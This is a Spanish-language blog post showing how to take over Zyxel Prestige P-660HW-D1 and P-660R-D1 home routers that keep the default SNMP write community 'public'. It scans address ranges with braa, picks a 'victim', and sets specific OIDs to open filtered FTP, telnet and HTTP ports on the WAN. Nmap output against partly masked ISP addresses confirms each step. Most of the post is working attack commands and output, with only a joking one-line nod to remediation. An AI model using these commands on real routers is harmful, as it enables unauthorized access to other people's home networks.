Hola amigos, en esta ocasión traigo material de primera ;), se trata de como modificar reglas de filtrado en los routers Zyxel Prestige P-660HW-D1, P-660R-D1 por SNMP. Estos equipos vienen configurados con una community por defecto tanto para lectura como para escritura, de esta forma se puede llegar a configurar el dispositivo por SNMP de forma remota.
Para empezar vamos a bajarnos y compilar la herramienta braa, se trata de un scanner SNMP.
Ahora que ya tenemos braa en nuestro sistema, pedimos un OID a un rango de direcciones, este OID es para pedir el nombre del sistema a los equipos de Zyxel(cada fabricante emplea su propia MIB).
Ahora solo falta seleccionar a la victima.
Comprobamos que los puertos estan cerrados:
Starting Nmap 4.53 ( http://insecure.org ) at 2009-06-22 19:12 CEST
Interesting ports on 100.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.100):
PORT STATE SERVICE
21/tcp filtered ftp
23/tcp filtered telnet
80/tcp filtered http
Ahora los abrimos.
Para los modelos P-660HW-D1:
braa -v -t 5 -p 200 public@88.22.xyz.100 :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5=i22 –> Abrimos el puerto 21
braa -v -t 5 -p 200 public@88.22.xyz.100 :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6=i24 –> Abrimos el puerto 23
Se puede deducir que sigue la lógica de puerto+1, queremos abrir el puerto 80 –> i"puerto+1" –> i80+1 –> i81
Comprobamos que realmente estan abiertos:
Starting Nmap 4.53 ( http://insecure.org ) at 2009-06-22 19:09 CEST
Interesting ports on 100.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.100):
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
80/tcp open http
Para dejarlo como antes:
braa -v -t 5 -p 200 public@88.22.xyz.100 :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5=i21
braa -v -t 5 -p 200 public@88.22.xyz.100 :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6=i23
Comprobamos que vuelven a estar cerrados.
Starting Nmap 4.53 ( http://insecure.org ) at 2009-06-22 19:12 CEST
Interesting ports on 100.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.100):
PORT STATE SERVICE
21/tcp filtered ftp
23/tcp filtered telnet
80/tcp filtered http
Ya veis parece increible pero puedo dar fe de que funciona ;)
En el modelo P-660R-D1
braa -v -t 5 -p 200 public@88.22.xyz.244 :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5=i22
braa -v -t 5 -p 200 public@88.22.xyz.244 :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6=i24
braa -v -t 5 -p 200 public@88.22.xyz.244 :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4=i80
braa -v -t 5 -p 200 public@88.22.xyz.244 :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5=i21
braa -v -t 5 -p 200 public@88.22.xyz.244 :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6=i23
Para remediar toda esta historia habrá que configurar SNMP con alguna community menos conocida, jejeje
La gente no suele cambiar la password por defecto de los routers caseros ya que deshabilitan el acceso en la interfaz WAN, pero de este modo BANG!! estamos dentro.